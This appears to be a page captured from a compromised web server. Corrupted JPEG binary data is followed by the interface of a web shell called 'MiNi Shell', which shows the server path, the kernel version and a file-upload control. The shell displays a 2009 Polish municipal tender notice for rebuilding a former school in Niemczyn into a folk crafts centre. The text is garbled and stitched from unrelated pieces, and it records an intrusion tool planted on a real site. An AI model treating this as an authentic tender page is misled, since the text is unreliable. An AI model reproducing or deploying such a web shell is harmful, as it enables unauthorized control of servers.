JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090916/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090916/320636-N-2009.html

<p class="kh_header"><b>Czarna Białostocka: Centrum Rękodzieła Ludowego - etap I - przebudowa budynku byłej szkoły w Niemczynie</b><br>
<b>Numer ogłoszenia: 320636 - 2009; data zamieszczenia: 16.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Czarna Białostocka reprezentowana przez Burmistrza Czarnej Białostockiej , ul. Traugutta 2, 16-020 Czarna Białostocka, woj. podlaskie, tel. 085 7131367, faks 085 7131349.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.czarnabialostocka.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Centrum Rękodzieła Ludowego - etap I - przebudowa budynku byłej szkoły w Niemczynie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia dotyczy przebudowy budynku byłej szkoły w Niemczynie z przeznaczeniem na Centrum Rękodzieła Ludowego, prace wchodzące w zakres przedmiotu zamówienia: roboty branży budowlanej: wyburzenia konstrukcji betonowych i żelbetowych zewnętrznych - ok. 5,90 m3, rozbiórka elementów ścian zewnętrznych - ok. 30 m2, rozbiórka elementów dachu w tym zdjęcie pokrycia z płyt azbestowo-cementowych - ok. 368,0 m2 i gąsiorów - ok. 31,0 m, rozebranie ławy kominiarskiej - 8,0 m, rozebranie konstrukcji więźby dachowej - deski dachu na styk - ok. 418 m2, deski okapowe, gzymsowe i wiatrowe - ok. 54,0 m, ołacenie dachu - ok. 418,0 m2, wyburzenia konstrukcji betonowych i żelbetowych wewnętrznych - ok. 9,5 m3, rozbiórki konstrukcji drewnianych wewnętrznych, demontaż przyborów i instalacji sanitarnych, rozbiórka podłóg - białych na wpust - ok. 206,0 m2, legarów drewnianych - ok. 152,0 m, usunięcie polepy z przestrzeni między belkami stropowymi - ok. 173 m2 (ok. 34,0 m3), wymiana podwalin 20 x 25 cm - ok. 19 m, rozbiórka ścian wewnętrznych z bali - ok. 156,0 m2, demontaż stolarki okiennej i drzwiowej, rozbiórka kominów i pieców, nowe pokrycia dachowe blacho dachówką - ok. 185,0 m2 z obróbkami blacharskimi, rynnami i rurami spustowymi, wykonanie nowych kominów murowanych z cegieł pełnych i prefabrykatów ceramicznych, oraz ław kominiarskich, dostawa i montaż nowej stolarki okiennej - 29 szt. i drzwiowej - 33 szt., docieplenie ścian cokołu płytami styrodur o gr. 8 cm - ok. 104,0 m2, z obłożeniem cokołu płytkami z kamienia - ok. 75,0 m2, docieplenie ścian nadziemia wełną mineralną o gr. 8 cm - ok. 212,0 m2 na ruszcie drewnianym  50 x 80 mm wykończone szalówką drewnianą - ok. 212,0 m2, docieplenie biegu i stropu nad piwnicą płytami styropianowymi o gr. 10 cm, wykonanie żelbetowych schodów zewnętrznych - ok. 21,0 m3 z wyprawą w postaci płytek antypoślizgowych - ok. 38,0 m2 oraz wewnętrznych - ok. 20,0 m2 wykonanie pochylni żelbetowych dla osób niepełnosprawnych - ok. 8,8 m3 z wyprawą w postaci płytek antypoślizgowych - ok. 30,5 m2, wykonanie elementów konstrukcyjnych wewnętrznych w postaci ław fundamentowych pod ściany murowane wewnętrzne - ok. 5,8 m3, stopy pod słupy, płyty stropowe i biegowe w deskowaniu tradycyjnym, słupy, belki, nadproża i wymiany żelbetowe, podciągi stalowe, wzmocnienie belek stropowych kątownikiem stalowym 80x80x6 mm - ok. 3 t, wykonanie konstrukcji drewnianych dachu, podłoża i posadzki poddasza z izolacją z wełny mineralnej o gr. 8 cm i parteru z izolacją płytami styropianowymi gr. 8 cm, podłoga na poddaszu na stropach drewnianych z płyt OSB gr. 18 mm układanych dwuwarstwowo z przekładkami akustycznymi z wyłożeniem posadzki płytkami z terakoty i wykładzin dywanowych, podłogi na parterze na posadzkach betonowych z wyłożeniem płytek terakoty oraz klepki drewnianej, wykonanie ścian wewnętrznych drewnianych i murowanych oraz z płyt GKF z wykończeniem, wykonanie sufitów z płyt GKF oraz GKW  o gr. 12,5 mm - ok. 473,0 m2 z wykończeniem, zakup i dostawa urządzenia dla osób niepełnosprawnych umożliwiającego komunikację na poddasze np. typ VIMEC T08, wykonanie podbitki z szalówki drewnianej wokół budynku, montaż nowych kratek wentylacyjnych oraz wyłazów dachowych; roboty branży sanitarnej: wykonanie instalacji c.o. z rur miedzianych łączonych na lut miękki (dn 15 mm - ok. 431,0 m, dn 22 mm - ok. 30,0 m) i twardy (dn 28 mm - ok. 35,0 m, dn 35 - ok. 18,0 m) z grzejnikami stalowymi, płytowymi i łazienkowymi z zaworami i głowicami termostatycznymi - kpl. 28, wykonanie kotłowni olejowej, wykonanie instalacji wodociągowo-kanalizacyjnej z białym montażem, wykonanie ogrzewania kominkowego i wentylacji mechanicznej wywiewnej, wykonanie pomiarów, prób i badań; roboty branży elektrycznej: wykonanie przyłącza napowietrznego nn z układem pomiarowym, dostawa i montaż tablicy rozdzielczej z wyposażeniem, wykonanie linii WLZ zasilających tablice rozdzielcze, wykonanie instalacji oświetlenia, gniazd wtykowych i siły, wykonanie instalacji odgromowej, wykonanie pomiarów, prób, badań; niezbędna obsługa geodezyjna oraz konieczność wykonania badań i odbiorów technicznych poszczególnych elementów realizowanej inwestycji.
2. Szczegółowy zakres prac zawierają: przedmiary robót stanowiące Załączniki nr 1 - 3 do SIWZ; projekty wykonawcze stanowiące Załączniki nr 4 - 6 do SIWZ; Specyfikacje Techniczne Wykonania i Odbioru Robót stanowiące Załączniki nr 7 - 9 do SIWZ.
3. Projekty budowlane oraz specyfikacje techniczne wykonania i odbioru robót w wersji papierowej dostępne są w siedzibie Zamawiającego.
4. Wymagany okres gwarancji min. 36 miesięcy od daty podpisania przez Zamawiającego i Wykonawcę protokołu odbioru końcowego.
5. Warunki płatności:  30 dni liczonych od dnia doręczenia faktury wystawionej po zakończeniu określonego etapu inwestycji potwierdzonego bezusterkowym protokołem odbioru etapu robót oraz 30 dni liczonych od dnia doręczenia faktury wystawionej po odbiorze końcowym robót potwierdzonym bezusterkowym protokołem odbioru końcowego; maksymalnie 3 faktury częściowe oraz faktura końcowa; pierwsza faktura wystawiona nie wcześniej niż 01.01.2010 roku..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 30.000,- zł (słownie: trzydzieści tysięcy złotych)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy: posiadający uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień; posiadający niezbędną wiedzę i doświadczenie oraz dysponujący potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia; znajdujący się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia; niepodlegający wykluczeniu z postępowania o udzielenie zamówienia. 
2. Ocena spełniania warunków udziału w postępowaniu przeprowadzona zostanie, według formuły spełnia / nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do oferty.
3. Z ubiegania się o zamówienie publiczne wyklucza się Wykonawców, którzy: nie spełniają warunków udziału w postępowaniu o zamówienie publiczne z art. 22 ustawy Prawo zamówień publicznych opisanych w pkt. 5.1. SIWZ; podlegają wykluczeniu na mocy art. 24 ust. 1 ustawy Prawo zamówień publicznych; wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania, lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności chyba, że udział tych wykonawców w postępowaniu nie utrudnia uczciwej konkurencji; złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania; nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków z zastrzeżeniem art. 26 ust. 3 ustawy Prawo zamówień publicznych, nie wnieśli wadium, w tym również na przedłużony okres związania ofertą, lub nie zgodzili się na przedłużenie okresu związania ofertą.
4. Zamawiający odrzuca ofertę: niezgodną z ustawą Prawo zamówień publicznych; której treść nie odpowiada treści specyfikacji istotnych warunków zamówienia, z zastrzeżeniem okoliczności wskazanej w art. 87 ust. 2 pkt. 3 ustawy Prawo zamówień publicznych; której złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji; zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia; Wykonawcy wykluczonego z udziału w postępowaniu o udzielenie zamówienia; zawierającą błędy w obliczeniu ceny; Wykonawcy, który w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził się na poprawienie omyłki, o której mowa w art. 87 ust 2 pkt. 3 ustawy Prawo zamówień publicznych; jest nieważna na podstawie odrębnych przepisów..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. W celu potwierdzenia, że Wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ust. 1 ustawy Prawo zamówień publicznych z udziału w postępowaniu o zamówienie publiczne Wykonawca składa następujące oświadczenia i dokumenty: aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert; aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert; aktualna informacja z Krajowego Rejestru Karnego albo równoważne zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt. 4-8 ustawy Prawo zamówień publicznych, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 9 ustawy Prawo zamówień publicznych, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;  dokumenty potwierdzające posiadanie uprawnień/pełnomocnictw osób podpisujących ofertę, o ile fakt ten nie wynika z przedstawionych dokumentów rejestrowych.
2. W celu potwierdzenia, że Wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia w postępowaniu o zamówienie publiczne składa następujące dokumenty: wykaz minimum 3 wykonanych w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, tj. przed datą publikacji ogłoszenia o zamówieniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, robót budowlanych odpowiadających lub większych swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości, dat wykonania oraz odbiorców; do wykazu Wykonawca zobowiązany jest dołączyć dokumenty potwierdzające, że roboty te zostały wykonane należycie (referencje, protokoły odbioru, itp.), wykaz należy sporządzić zgodnie ze wzorem stanowiącym Załącznik nr 11 do SIWZ; wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonaniu zamówienia, wraz z dokumentami potwierdzającymi posiadanie uprawnień budowlanych do kierowania robotami budowlanymi przez wskazane osoby w zakresie niezbędnym do wykonania zamówienia w specjalności budowlanej, sanitarnej i elektrycznej oraz zaświadczenia, wydane przez właściwą izbę samorządu zawodowego (Okręgową Izbę Inżynierów Budownictwa), potwierdzające wpis danej osoby na listę członków właściwej izby; w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał techniczny i kadrowy oraz łączne kwalifikacje i doświadczenie, wykaz należy sporządzić zgodnie ze wzorem stanowiącym Załącznik nr 12 do SIWZ; pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt. 9.2 lit. b Wykonawca wskazał osoby, którymi będzie dysponował.
3. W celu potwierdzenia, że Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia w postępowaniu o zamówienie publiczne składa następujące dokumenty polisa, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności, suma ubezpieczenia wynikająca z polisy powinna być równa lub wyższa cenie ofertowej brutto.
4. Inne dokumenty i załączniki: kosztorys ofertowy sporządzony w oparciu o przedmiary robót stanowiące Załączniki do SIWZ; harmonogram realizacji inwestycji z podziałem na kwartały i zakresy robót oraz przewidywane koszty realizacji wynikające ze szczegółowego kosztorysu ofertowego..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.czarnabialostocka.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Czarnej Białostockiej; 16-020 Czarna Białostocka, ul. Traugutta 2, pokój nr 8.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.10.2009 godzina 10:00, miejsce: Urząd Miejski w Czarnej Białostockiej; 16-020 Czarna Białostocka, ul. Traugutta 2, pokój nr 8.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com